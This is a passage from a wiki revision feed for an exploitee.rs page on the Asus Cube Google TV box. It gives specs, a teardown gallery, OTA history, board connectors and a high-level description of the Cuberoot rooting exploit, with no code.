File:Asus_cube_teardown10.jpg&lt;br /&gt;
File:Asus_cube_teardown11.jpg&lt;br /&gt;
File:Asus_cube_teardown12.jpg&lt;br /&gt;
File:Asus_cube_teardown13.jpg&lt;br /&gt;
File:Asus_cube_teardown14.jpg&lt;br /&gt;
File:Asus_cube_teardown15.jpg&lt;br /&gt;
File:Asus_cube_teardown16.jpg&lt;br /&gt;
File:Asus_cube_teardown17.jpg&lt;br /&gt;
File:Asus_cube_teardown18.jpg&lt;br /&gt;
File:Asus_cube_teardown19.jpg&lt;br /&gt;
File:Asus_cube_teardown20.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the &amp;quot;Asus Qube&amp;quot;&lt;br /&gt;
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as &amp;quot;Cube&amp;quot;, adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]&lt;br /&gt;
&lt;br /&gt;
== Connections / Connectors / Switches ==&lt;br /&gt;
*J2 - SPI ?&lt;br /&gt;
*UART1 - UART (115200 8n1)&lt;br /&gt;
*UART2&lt;br /&gt;
*RF_CON - Remote Control Antenna Board &lt;br /&gt;
*WIFI_CON - WiFi / BT Antenna Board (SDIO) &lt;br /&gt;
*SW1 - Factory Reset&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1131</id>
		<title>Asus Cube</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1131"/>
		<updated>2013-05-17T06:46:45Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Asus_cube.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Asus]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.&lt;br /&gt;
&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&amp;amp;tag=gtvcom-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
These specifications are unverified, but based off of the SOC this should hold to be &amp;quot;trueish&amp;quot;.&lt;br /&gt;
We will update this once the hardware ships.&lt;br /&gt;
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU&lt;br /&gt;
*1 GB DDR3 Memory &lt;br /&gt;
*4 GB Flash NAND&lt;br /&gt;
*Two USB Ports&lt;br /&gt;
*IR Blaster&lt;br /&gt;
&lt;br /&gt;
== Cuberoot ==&lt;br /&gt;
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within  a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.&lt;br /&gt;
&lt;br /&gt;
This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.&lt;br /&gt;
&lt;br /&gt;
Cuberoot will:&lt;br /&gt;
*Root your Asus Cube.&lt;br /&gt;
*Install SuperSu.&lt;br /&gt;
*Modify the Flash Player to bypass website blocks on streaming media sites.&lt;br /&gt;
*Disable automatic updates.&lt;br /&gt;
*Collect anonymous statistical information about your device.&lt;br /&gt;
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.&lt;br /&gt;
&lt;br /&gt;
Download Here&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Asus_cube_teardown1.jpg&lt;br /&gt;
File:Asus_cube_teardown2.jpg&lt;br /&gt;
File:Asus_cube_teardown3.jpg&lt;br /&gt;
File:Asus_cube_teardown4.jpg&lt;br /&gt;
File:Asus_cube_teardown5.jpg&lt;br /&gt;
File:Asus_cube_teardown6.jpg&lt;br /&gt;
File:Asus_cube_teardown7.jpg&lt;br /&gt;
File:Asus_cube_teardown8.jpg&lt;br /&gt;
File:Asus_cube_teardown9.jpg&lt;br /&gt;
File:Asus_cube_teardown10.jpg&lt;br /&gt;
File:Asus_cube_teardown11.jpg&lt;br /&gt;
File:Asus_cube_teardown12.jpg&lt;br /&gt;
File:Asus_cube_teardown13.jpg&lt;br /&gt;
File:Asus_cube_teardown14.jpg&lt;br /&gt;
File:Asus_cube_teardown15.jpg&lt;br /&gt;
File:Asus_cube_teardown16.jpg&lt;br /&gt;
File:Asus_cube_teardown17.jpg&lt;br /&gt;
File:Asus_cube_teardown18.jpg&lt;br /&gt;
File:Asus_cube_teardown19.jpg&lt;br /&gt;
File:Asus_cube_teardown20.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the &amp;quot;Asus Qube&amp;quot;&lt;br /&gt;
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as &amp;quot;Cube&amp;quot;, adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]&lt;br /&gt;
&lt;br /&gt;
== Connections / Connectors / Switches ==&lt;br /&gt;
*J2 - SPI ?&lt;br /&gt;
*UART1 - UART (115200 8n1)&lt;br /&gt;
*UART2&lt;br /&gt;
*RF_CON - Remote Control Antenna Board &lt;br /&gt;
*WIFI_CON - WiFi / BT Antenna Board (SDIO) &lt;br /&gt;
*SW1 - Factory Reset&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1130</id>
		<title>Asus Cube</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1130"/>
		<updated>2013-04-25T05:13:17Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Specs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Asus_cube.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Asus]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.&lt;br /&gt;
&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&amp;amp;tag=gtvcom-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
These specifications are unverified, but based off of the SOC this should hold to be &amp;quot;trueish&amp;quot;.&lt;br /&gt;
We will update this once the hardware ships.&lt;br /&gt;
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU&lt;br /&gt;
*1 GB DDR3 Memory &lt;br /&gt;
*4 GB Flash NAND&lt;br /&gt;
*Two USB Ports&lt;br /&gt;
*IR Blaster&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Asus_cube_teardown1.jpg&lt;br /&gt;
File:Asus_cube_teardown2.jpg&lt;br /&gt;
File:Asus_cube_teardown3.jpg&lt;br /&gt;
File:Asus_cube_teardown4.jpg&lt;br /&gt;
File:Asus_cube_teardown5.jpg&lt;br /&gt;
File:Asus_cube_teardown6.jpg&lt;br /&gt;
File:Asus_cube_teardown7.jpg&lt;br /&gt;
File:Asus_cube_teardown8.jpg&lt;br /&gt;
File:Asus_cube_teardown9.jpg&lt;br /&gt;
File:Asus_cube_teardown10.jpg&lt;br /&gt;
File:Asus_cube_teardown11.jpg&lt;br /&gt;
File:Asus_cube_teardown12.jpg&lt;br /&gt;
File:Asus_cube_teardown13.jpg&lt;br /&gt;
File:Asus_cube_teardown14.jpg&lt;br /&gt;
File:Asus_cube_teardown15.jpg&lt;br /&gt;
File:Asus_cube_teardown16.jpg&lt;br /&gt;
File:Asus_cube_teardown17.jpg&lt;br /&gt;
File:Asus_cube_teardown18.jpg&lt;br /&gt;
File:Asus_cube_teardown19.jpg&lt;br /&gt;
File:Asus_cube_teardown20.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the &amp;quot;Asus Qube&amp;quot;&lt;br /&gt;
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as &amp;quot;Cube&amp;quot;, adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]&lt;br /&gt;
&lt;br /&gt;
== Connections / Connectors / Switches ==&lt;br /&gt;
*J2 - SPI ?&lt;br /&gt;
*UART1 - UART (115200 8n1)&lt;br /&gt;
*UART2&lt;br /&gt;
*RF_CON - Remote Control Antenna Board &lt;br /&gt;
*WIFI_CON - WiFi / BT Antenna Board (SDIO) &lt;br /&gt;
*SW1 - Factory Reset&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1108</id>
		<title>Asus Cube</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1108"/>
		<updated>2013-04-25T03:54:35Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Update History */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Asus_cube.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Asus]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.&lt;br /&gt;
&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&amp;amp;tag=gtvcom-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the &amp;quot;Asus Qube&amp;quot;&lt;br /&gt;
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as &amp;quot;Cube&amp;quot;, adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]&lt;br /&gt;
&lt;br /&gt;
== Connections / Connectors / Switches ==&lt;br /&gt;
*J2 - SPI ?&lt;br /&gt;
*UART1 - UART (115200 8n1)&lt;br /&gt;
*UART2&lt;br /&gt;
*RF_CON - Remote Control Antenna Board &lt;br /&gt;
*WIFI_CON - WiFi / BT Antenna Board (SDIO) &lt;br /&gt;
*SW1 - Factory Reset&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1107</id>
		<title>Asus Cube</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1107"/>
		<updated>2013-04-25T03:54:14Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Update History */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Asus_cube.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Asus]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.&lt;br /&gt;
&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&amp;amp;tag=gtvcom-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the &amp;quot;Asus Qube&amp;quot;&lt;br /&gt;
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as &amp;quot;Cube&amp;quot;, adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip ]&lt;br /&gt;
&lt;br /&gt;
== Connections / Connectors / Switches ==&lt;br /&gt;
*J2 - SPI ?&lt;br /&gt;
*UART1 - UART (115200 8n1)&lt;br /&gt;
*UART2&lt;br /&gt;
*RF_CON - Remote Control Antenna Board &lt;br /&gt;
*WIFI_CON - WiFi / BT Antenna Board (SDIO) &lt;br /&gt;
*SW1 - Factory Reset&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1106</id>
		<title>Asus Cube</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1106"/>
		<updated>2013-04-25T03:49:12Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Connections / Connectors / Switches */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Asus_cube.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Asus]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.&lt;br /&gt;
&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&amp;amp;tag=gtvcom-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Connections / Connectors / Switches ==&lt;br /&gt;
*J2 - SPI ?&lt;br /&gt;
*UART1 - UART (115200 8n1)&lt;br /&gt;
*UART2&lt;br /&gt;
*RF_CON - Remote Control Antenna Board &lt;br /&gt;
*WIFI_CON - WiFi / BT Antenna Board (SDIO) &lt;br /&gt;
*SW1 - Factory Reset&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
</feed>